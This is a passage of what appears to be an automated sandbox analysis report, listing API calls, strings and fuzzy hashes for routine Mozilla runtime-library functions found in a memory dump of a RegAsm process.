                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C60B61E), ref: 6C60B73F
                                                                                                                                                        • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B760
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B79A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1394714614-0
                                                                                                                                                        • Opcode ID: b7e33c066784a7a50a7d0d3304996afdf1866d18f7c53e5e67e9e47b9c1b6deb
                                                                                                                                                        • Instruction ID: 7034dea0afbbf142a1ecfc8e7d100f74241234bb96f332762f2b202165339eb0
                                                                                                                                                        • Opcode Fuzzy Hash: b7e33c066784a7a50a7d0d3304996afdf1866d18f7c53e5e67e9e47b9c1b6deb
                                                                                                                                                        • Instruction Fuzzy Hash: B441E4B2E001159FCB14DF68DD806AEB7B5FF85324F254629E825F7780E731A90087E9
                                                                                                                                                        APIs
                                                                                                                                                        • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C67B5B9
                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C67B5C5
                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C67B5DA
                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C67B5F4
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C67B605
                                                                                                                                                        • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C67B61F
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C67B631
                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C67B655
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1276798925-0
                                                                                                                                                        • Opcode ID: a0c47448ddceed92c698e3d50cbaf79e866052a07a10b8a9dbe7c2c9baef63d7
                                                                                                                                                        • Instruction ID: 608238bc4642f334cd1cc372f85910d99a9708cbbf257ef18346c27490a28886
                                                                                                                                                        • Opcode Fuzzy Hash: a0c47448ddceed92c698e3d50cbaf79e866052a07a10b8a9dbe7c2c9baef63d7
                                                                                                                                                        • Instruction Fuzzy Hash: 54317275B01115ABCB109F6AC8949AEB7F5EBCB324F140915DA0697741DB30A806CFBE
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63FA80: GetCurrentThreadId.KERNEL32 ref: 6C63FA8D
                                                                                                                                                          • Part of subcall function 6C63FA80: AcquireSRWLockExclusive.KERNEL32(6C68F448), ref: 6C63FA99
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C646727
                                                                                                                                                        • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6467C8
                                                                                                                                                          • Part of subcall function 6C654290: memcpy.VCRUNTIME140(?,?,6C662003,6C660AD9,?,6C660AD9,00000000,?,6C660AD9,?,00000004,?,6C661A62,?,6C662003,?), ref: 6C6542C4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                        • String ID: data$vhl
                                                                                                                                                        • API String ID: 511789754-3148178927
                                                                                                                                                        • Opcode ID: d31a9f04248f7ea05369b6513cd80d6e1a0f2e49c1450c3e45ea9792ea8ed1b9
                                                                                                                                                        • Instruction ID: 7365bd2de2efb8e4df808bb591c1501763efa2b85c6cf1cd64bcf18a17470158
                                                                                                                                                        • Opcode Fuzzy Hash: d31a9f04248f7ea05369b6513cd80d6e1a0f2e49c1450c3e45ea9792ea8ed1b9
                                                                                                                                                        • Instruction Fuzzy Hash: 41D1CF75A093409FD724CF25C841B9EB7F5AFC6308F10892DE58987B91DB70E849CB6A
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C60EB57,?,?,?,?,?,?,?,?,?), ref: 6C63D652
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C60EB57,?), ref: 6C63D660
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C60EB57,?), ref: 6C63D673
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C63D888
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$memsetmoz_xmalloc
                                                                                                                                                        • String ID: W`l$|Enabled
                                                                                                                                                        • API String ID: 4142949111-1284899109
                                                                                                                                                        • Opcode ID: 520b344ef630b270d03548fffe450aa15c9a9ea0bfcc4398daec8096d1fae41e
                                                                                                                                                        • Instruction ID: d8a93e9b097fa96d6ed39dea4d3bb09b293ef142051ffbc287a598767437aab3
                                                                                                                                                        • Opcode Fuzzy Hash: 520b344ef630b270d03548fffe450aa15c9a9ea0bfcc4398daec8096d1fae41e
                                                                                                                                                        • Instruction Fuzzy Hash: D2A126B0A053249FDB11CF69C4D07EEBBF1AF4A318F14A05CD899AB741C731A945CBA9
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C651D0F
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,6C651BE3,?,?,6C651D96,00000000), ref: 6C651D18
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,6C651BE3,?,?,6C651D96,00000000), ref: 6C651D4C
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C651DB7
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C651DC0
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C651DDA
                                                                                                                                                          • Part of subcall function 6C651EF0: GetCurrentThreadId.KERNEL32 ref: 6C651F03
                                                                                                                                                          • Part of subcall function 6C651EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C651DF2,00000000,00000000), ref: 6C651F0C
                                                                                                                                                          • Part of subcall function 6C651EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C651F20
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C651DF4
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1880959753-0
                                                                                                                                                        • Opcode ID: 9307afd0ed04c79aa529f0ce570ac73364e506261f6197d936dbd82eb0b1f93a
                                                                                                                                                        • Instruction ID: b43357ad5094494e87d55af489729dc3047ded0bdbf9db5adff46350d4f92147
                                                                                                                                                        • Opcode Fuzzy Hash: 9307afd0ed04c79aa529f0ce570ac73364e506261f6197d936dbd82eb0b1f93a
                                                                                                                                                        • Instruction Fuzzy Hash: EF418CB5201701AFCB10CF29C888A56BBF5FF8A314F50452DE95A87B41CB71F864CBA9
                                                                                                                                                        APIs
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6484F3
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64850A
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64851E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64855B
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64856F
                                                                                                                                                        • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6485AC
                                                                                                                                                          • Part of subcall function 6C647670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6485B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C64767F
                                                                                                                                                          • Part of subcall function 6C647670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6485B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C647693
                                                                                                                                                          • Part of subcall function 6C647670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6485B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6476A7
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6485B2
                                                                                                                                                          • Part of subcall function 6C625E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C625EDB
                                                                                                                                                          • Part of subcall function 6C625E90: memset.VCRUNTIME140(ewfl,000000E5,?), ref: 6C625F27
                                                                                                                                                          • Part of subcall function 6C625E90: LeaveCriticalSection.KERNEL32(?), ref: 6C625FB2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2666944752-0
                                                                                                                                                        • Opcode ID: fa908498558acf4e6282fec861ee9a915c75e68931382965f038b2e958616856
                                                                                                                                                        • Instruction ID: c7f1e369637b919471c09d40f96cad87de6c4b5625449b097e1ad095d9cd615a
                                                                                                                                                        • Opcode Fuzzy Hash: fa908498558acf4e6282fec861ee9a915c75e68931382965f038b2e958616856
                                                                                                                                                        • Instruction Fuzzy Hash: F221D3702016019FDB18DF25D888A5A77B5AF8930CF14892DE54BC3B41DB31F958CB99
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C611699
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116CB
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116D7
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116DE
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116E5
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6116EC
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6116F9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 375572348-0
                                                                                                                                                        • Opcode ID: 11cbabc1ec345ad55dc610c174cf3957bc8bbd95d9adc1c687dbec9aa90c88b6
                                                                                                                                                        • Instruction ID: e7862b3943bc99f6abbfde1fb144caf80d9ec5239f32675b020f39fcf6c08313
                                                                                                                                                        • Opcode Fuzzy Hash: 11cbabc1ec345ad55dc610c174cf3957bc8bbd95d9adc1c687dbec9aa90c88b6
                                                                                                                                                        • Instruction Fuzzy Hash: C621D2B07442087BFB116A698C85FFB737CEFD6704F004528F6059B680C6759D5486B9
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F619
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C64F598), ref: 6C64F621
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F637
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8,?,?,00000000,?,6C64F598), ref: 6C64F645
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8,?,?,00000000,?,6C64F598), ref: 6C64F663
                                                                                                                                                        Strings
                                                                                                                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C64F62A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                        • API String ID: 1579816589-753366533
                                                                                                                                                        • Opcode ID: 1f22cb9e14de4fd154e323303344edf48b0cd2d600f59deacc8df82384c85cab
                                                                                                                                                        • Instruction ID: e9c54e21a85619670ec84b10d4a2980a79a5cedfb79f04fff76ce72d15e37143
                                                                                                                                                        • Opcode Fuzzy Hash: 1f22cb9e14de4fd154e323303344edf48b0cd2d600f59deacc8df82384c85cab
                                                                                                                                                        • Instruction Fuzzy Hash: 24119475202604BFCB04AF5AD9889D57779FF87358F508016EA0683F02CB71A825CBBE
                                                                                                                                                        APIs
                                                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 6C6676F2
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001), ref: 6C667705
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C667717
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C66778F,00000000,00000000,00000000,00000000), ref: 6C667731
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C667760
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                        • String ID: }>dl
                                                                                                                                                        • API String ID: 2538299546-3547458583
                                                                                                                                                        • Opcode ID: bf3ce814bec1e96ec8bb924860b7fa3fc28795f9688412a7e339572d10c15392
                                                                                                                                                        • Instruction ID: bac569d5c1e4a6e3ad3d29cc1125d4beefec48cc044366c82451e7606e28fecb
                                                                                                                                                        • Opcode Fuzzy Hash: bf3ce814bec1e96ec8bb924860b7fa3fc28795f9688412a7e339572d10c15392
                                                                                                                                                        • Instruction Fuzzy Hash: 0A11B2B19052156BE720AF7A9C44BABBFE8EF46354F144529F888A7700E77089448BE6
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C63D9F0,00000000), ref: 6C610F1D
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C610F3C
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C610F50
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C63D9F0,00000000), ref: 6C610F86
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                        • String ID: CoInitializeEx$combase.dll
                                                                                                                                                        • API String ID: 4190559335-2063391169
                                                                                                                                                        • Opcode ID: 55695b8eace62e97c07e8c33f39df5ca15d16196db7f63840010aebba92c1635
                                                                                                                                                        • Instruction ID: a4e78cf7d50bb492114f10c447e83c7e9c37083acb1698ea5ea692450833c822
                                                                                                                                                        • Opcode Fuzzy Hash: 55695b8eace62e97c07e8c33f39df5ca15d16196db7f63840010aebba92c1635
                                                                                                                                                        • Instruction Fuzzy Hash: EE11707470B241BFDF00CF6AC989A463778EB9F326F104629ED0592A81D732A415CA7F
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F559
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64F561
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F577
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64F585
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64F5A3
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_resume, xrefs: 6C64F239
                                                                                                                                                        • [I %d/%d] profiler_pause_sampling, xrefs: 6C64F3A8
                                                                                                                                                        • [I %d/%d] profiler_resume_sampling, xrefs: 6C64F499
                                                                                                                                                        • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C64F56A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                        • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                        • API String ID: 2848912005-2840072211
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,6C610DF8), ref: 6C610E82
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C610EA1
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C610EB5
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C610EC5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                        • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                        • API String ID: 391052410-1680159014
